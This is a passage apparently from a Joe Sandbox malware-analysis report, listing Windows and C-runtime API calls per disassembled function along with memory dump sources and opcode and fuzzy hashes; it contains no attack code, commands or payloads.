                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3033907384-0
                                                                                                                  • Opcode ID: 556c32883312d9645b866383fdd0567a3a16999fb16c373c064bdb38905da7d0
                                                                                                                  • Instruction ID: 0ce1a926f4839343849014e1bb8d636453fe7353d5e74a1f7ad37f24c61b3074
                                                                                                                  • Opcode Fuzzy Hash: 556c32883312d9645b866383fdd0567a3a16999fb16c373c064bdb38905da7d0
                                                                                                                  • Instruction Fuzzy Hash: F0F03CB6104214BFAB10AF65AC44DBB7FAEEF8A3607008026FD08CA111DA31DC00C775
                                                                                                                  APIs
                                                                                                                  • ___lock_fhandle.LIBCMT ref: 00D9F7D9
                                                                                                                  • __close_nolock.LIBCMT ref: 00D9F7F2
                                                                                                                    • Part of subcall function 00D9886A: __getptd_noexit.LIBCMT ref: 00D9886A
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1046115767-0
                                                                                                                  • Opcode ID: 25d9afde3779225b395cc0834291b09d91cc82f2fa151ba22fe6e835df90cc51
                                                                                                                  • Instruction ID: 0fbb3253d132c9835fe2c54022bb8302ccaf9738aa957e4f2e967e02c73af215
                                                                                                                  • Opcode Fuzzy Hash: 25d9afde3779225b395cc0834291b09d91cc82f2fa151ba22fe6e835df90cc51
                                                                                                                  • Instruction Fuzzy Hash: B11108B2C056149EDF517FA4E8463587A90DF42731F6A0360E474AF1E3CBB4990097B1
                                                                                                                  APIs
                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 00DC9534
                                                                                                                  • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00DC9557
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastsend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1802528911-0
                                                                                                                  • Opcode ID: 7c76bde2355aa13f65c37e9f3a14db07445165ab8a205951d817139a2edc5ccd
                                                                                                                  • Instruction ID: afa37ffe7b4254dd014411f55ff6faa5deba24c3bca9a07aca0aabfe3021e58a
                                                                                                                  • Opcode Fuzzy Hash: 7c76bde2355aa13f65c37e9f3a14db07445165ab8a205951d817139a2edc5ccd
                                                                                                                  • Instruction Fuzzy Hash: 5F011A752002009FD710EB68D895B6AB7EAEB99720F14852EE65A8B391DA70EC05CB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • __lock_file.LIBCMT ref: 00D942B9
                                                                                                                    • Part of subcall function 00D95A9F: __lock.LIBCMT ref: 00D95AC2
                                                                                                                  • __fclose_nolock.LIBCMT ref: 00D942C4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2800547568-0
                                                                                                                  • Opcode ID: 431412a4639828016ffa70c08ecad3614f8bd1a8b11f2ccc7a85872502bd2c4c
                                                                                                                  • Instruction ID: c0290e876b2e6fd54378ee87d810a53aabc3d2ac59e6bffa058f567ef173124f
                                                                                                                  • Opcode Fuzzy Hash: 431412a4639828016ffa70c08ecad3614f8bd1a8b11f2ccc7a85872502bd2c4c
                                                                                                                  • Instruction Fuzzy Hash: F4F0B4318127149ADF21ABB59802B5E6BD0BF41334F258209B864AB1C3CB7CD9029B79
                                                                                                                  APIs
                                                                                                                  • timeGetTime.WINMM ref: 00D8F57A
                                                                                                                    • Part of subcall function 00D7E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7E279
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00DE75D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePeekSleepTimetime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1792118007-0
                                                                                                                  • Opcode ID: af95447e38c3e55b4fb82c9812056aae4c5934a1037ab9b5bf70dee0ce549e09
                                                                                                                  • Instruction ID: 21d727ceaedb29d5c6a4027c394939b5604e17555ac02a861403e56fcb4ffa1e
                                                                                                                  • Opcode Fuzzy Hash: af95447e38c3e55b4fb82c9812056aae4c5934a1037ab9b5bf70dee0ce549e09
                                                                                                                  • Instruction Fuzzy Hash: 5DF058712003149FD314EF69D409BA6BBE9EB58320F00806AF85EC7351EB70A800CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • __wcsnicmp.LIBCMT ref: 00D783C4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __itow__swprintf__wcsnicmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 712828618-0
                                                                                                                  • Opcode ID: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                                                                                                  • Instruction ID: 08044cb65dd6342eef68762ba70563ed6e1826b2d831992b82227fa7ddb0091f
                                                                                                                  • Opcode Fuzzy Hash: 4774ebe45454ccd5e61ca601947f7bc710b3c6367f6404d2ed68767689bd55da
                                                                                                                  • Instruction Fuzzy Hash: F6F15C71508342AFC705EF18C89586FBBE6FF98314F54891DF98A97221EB30E905DB62
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                  • Instruction ID: 15501085da0c1d8dfce541a51d293db21e4c9fd335259cb90cfa7490b7e847ee
                                                                                                                  • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                  • Instruction Fuzzy Hash: 5861A1B0A042069FCB10EF55C884A7AF7E5FF18310F148269E916C7691E731EC95CBB1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: efcdf9dab569f9a8f0f01199b5b330d6128a1d6fa7ff8e88c935a951b3ec5c9f
                                                                                                                  • Instruction ID: 393533ffebf50b03ec38cf4410c12ab383cf7d965dee5b27d69d79ee9c2dbfeb
                                                                                                                  • Opcode Fuzzy Hash: efcdf9dab569f9a8f0f01199b5b330d6128a1d6fa7ff8e88c935a951b3ec5c9f
                                                                                                                  • Instruction Fuzzy Hash: B0516035600214AFCF14FB68CD91EAD77AAEF49354B148069F54A9B292EB30ED01DB70
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                  • Instruction ID: 1920e881237ac9d8aca207aede895c4139ca00108e365cc6b3fff245f8642076
                                                                                                                  • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                  • Instruction Fuzzy Hash: 8F414B79200702DFC7289F19D491A62F7E0FF89361718C56EE99E8B751E730E852CB61
                                                                                                                  APIs
                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00D74F8F
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  • Opcode ID: 1b67aa49db2bc8018deba10b7f2a52bbefb97edeb99ca7c6a536c117a56c987a
                                                                                                                  • Instruction ID: 8d92d38934c74c4ddf811073a1a8d6647e8cf34ba569a7eec13ab8aceb5a5b40
                                                                                                                  • Opcode Fuzzy Hash: 1b67aa49db2bc8018deba10b7f2a52bbefb97edeb99ca7c6a536c117a56c987a
                                                                                                                  • Instruction Fuzzy Hash: E8311971A00656ABCB09DF6DC484AADF7B5BF88310F18C629E81997754E770F990CBA0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: select
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1274211008-0
                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction ID: c670bd78d18feaca2579cb7dc9e9d626276146e6cd686ff6577ac5f2707c76a4
                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction Fuzzy Hash: A231B570A04106EBC718FF58D480A6DFBA5FB59310B2986A5E489CB255D731EDC1CFE0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: 4aea30adbb89a47ddc42de1f4466e179d8906f8cc90ab7c7a4170e6360deed5b
                                                                                                                  • Instruction ID: 28705394305fe936d6e3f7ffd9353f7ac963cb30f0ec3674af0eaac964ccc81d
                                                                                                                  • Opcode Fuzzy Hash: 4aea30adbb89a47ddc42de1f4466e179d8906f8cc90ab7c7a4170e6360deed5b
                                                                                                                  • Instruction Fuzzy Hash: CD413A74504751CFEB24EF19C484B1ABBE1BF45308F1985ACE9995B362C372E885CF62
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 6da7789ed68bcf03a2f941c46a6c490c2cabff1088e00309fef73c8f97239aba
                                                                                                                  • Instruction ID: c020c3258bd959d2c7334ab551c906a7b3ed1e60fd1737a00b8984ea8f09931d
                                                                                                                  • Opcode Fuzzy Hash: 6da7789ed68bcf03a2f941c46a6c490c2cabff1088e00309fef73c8f97239aba
                                                                                                                  • Instruction Fuzzy Hash: CC21C070A00608EBCB24BF56E84066A7BF8EB55350F21C96EE4CAE5110EB309591CBB5
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                  • Instruction ID: be0808ec2337f403352969570873617a97b10e6d38585f64a62fe4ced1f0c53e
                                                                                                                  • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                  • Instruction Fuzzy Hash: 65112E76600605DFD724DF28E581916BBF9FF49364724C42EE98ECB661E732E841CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D73F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00D73F90
                                                                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D734E2,?,00000001), ref: 00D73FCD
                                                                                                                    • Part of subcall function 00D73E78: FreeLibrary.KERNEL32(00000000), ref: 00D73EAB
                                                                                                                    • Part of subcall function 00D74010: _memmove.LIBCMT ref: 00D7405A
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Free$Load_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3640140200-0
                                                                                                                  • Opcode ID: b8555c24b5252fb032551e6b154a92e11980ee232543fb99e6fdc05f93c02dc0
                                                                                                                  • Instruction ID: 1b7fb3bd64535c45f1c10088b72e4635403320a94b7c19d19a00baf3e66532b9
                                                                                                                  • Opcode Fuzzy Hash: b8555c24b5252fb032551e6b154a92e11980ee232543fb99e6fdc05f93c02dc0
                                                                                                                  • Instruction Fuzzy Hash: 5811E332600305AACB15BB64DC03F9D76A5EF50740F50C829F98AE7181FB709A01AB70
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: 04270c843da963c2059549544dcd01a8f0ede661be33fee1953c42a505719049
                                                                                                                  • Instruction ID: e1c4150000a7d2db0bddd57770620cf02f08cdeab09e70cd3c14547103344f8f
                                                                                                                  • Opcode Fuzzy Hash: 04270c843da963c2059549544dcd01a8f0ede661be33fee1953c42a505719049
                                                                                                                  • Instruction Fuzzy Hash: 4D212774508741CFEB24EF68C444A2ABBE1FF89304F194968E99557622C331E889CF62
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                                                                                                                  • Instruction ID: 2998be0727a699a3498a52de0ad89c8ed540bdcde5baa2ae81d99a58609b78af
                                                                                                                  • Opcode Fuzzy Hash: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                                                                                                                  • Instruction Fuzzy Hash: E001E532204711AFCB10EB2CC886D6BB398EF44760B54C22AFC5E87291FF219C1297B0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1029625771-0
                                                                                                                  • Opcode ID: ae66eb34b4a0155b2dbc8aab873c409006204f15289879d4c7b12b56d92770df
                                                                                                                  • Instruction ID: 995cba582019d7d1348cf70aed0abf0c630af5893cd63461916a632eba1f664e
                                                                                                                  • Opcode Fuzzy Hash: ae66eb34b4a0155b2dbc8aab873c409006204f15289879d4c7b12b56d92770df
                                                                                                                  • Instruction Fuzzy Hash: 6F11913A305215AFDB10DF58C480A9A77E9FF49720B09816AFD498B355CB30AC40CBB1
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00D74E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00D74CF7
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 493772c4d0bca5ad7d7985644e55f9ede7ffd82b0f66b9cef7d1e1eacfb40eb5
                                                                                                                  • Instruction ID: 75489ebf788039cacae4e7f0fabcfa6e850241467daa787c30859ea658d76599
                                                                                                                  • Opcode Fuzzy Hash: 493772c4d0bca5ad7d7985644e55f9ede7ffd82b0f66b9cef7d1e1eacfb40eb5
                                                                                                                  • Instruction Fuzzy Hash: 5E113931202B459FD722CF1AC881F66B7E9EF44754F14C51EE5AA86A50E7B1F844CB70
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                  • Instruction ID: d8aefb1d3db2d2dde514e5933715a2da947cae0ef1648ea52b6ee57924bcba20
                                                                                                                  • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                  • Instruction Fuzzy Hash: 0B017CB5200542AFC306AB2CC981D39F7AAFF853507148159E869C7702DB30EC22CBF1
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                  • Instruction ID: 2b344448b30475782a4f408ac0bad953f817bef853bce291e08787839571fd2d
                                                                                                                  • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                  • Instruction Fuzzy Hash: BC01F9722107016ED7149B79D807A66BBA8DF44760F50C52EF95ECB1D1FB71E4008BB0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4104443479-0
                                                                                                                  • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                  • Instruction ID: e8d49ed84661833107920eb76e09a82d956009513dcaa7a2f2f5e4c49d8b2d6a
                                                                                                                  • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                  • Instruction Fuzzy Hash: 6F01F931004701EBCB30BF28E845E5FBBA8EF82760B14853DF89897251EB31E85197B1
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00DC95C9
                                                                                                                  Similarity
                                                                                                                  • API ID: Startup
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 724789610-0
                                                                                                                  • Opcode ID: 98aa396bc3c946336e8a22adf13f8c7b2a9a907650c840ab9eb96e57ff12b358
                                                                                                                  • Instruction ID: aa80113a2aaafe5ed3e4b17fa4d2d5169be517c357c87e3fc0f681de385b6498
                                                                                                                  • Opcode Fuzzy Hash: 98aa396bc3c946336e8a22adf13f8c7b2a9a907650c840ab9eb96e57ff12b358
                                                                                                                  • Instruction Fuzzy Hash: 07E0E5332043146FC310EA64DC05AABB79AFF85720F14871ABDA58B2C1EA30DC14C7E1
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00D734E2,?,00000001), ref: 00D73E6D
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  APIs
                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00DB7A11
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FolderPath_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3334745507-0
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D71952
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendTimeout
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1599653421-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D71952
                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DAE3AA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1777923405-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: TextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 530164218-0
                                                                                                                  APIs
                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00DE49DA,?,?,00000000), ref: 00D74FC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00D750BE,?,00D75088,?,00D7BE3D,00E322E8,?,00000000,?,00D73E2E,?,00000000,?), ref: 00D7510C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2962429428-0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00DDAFDB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
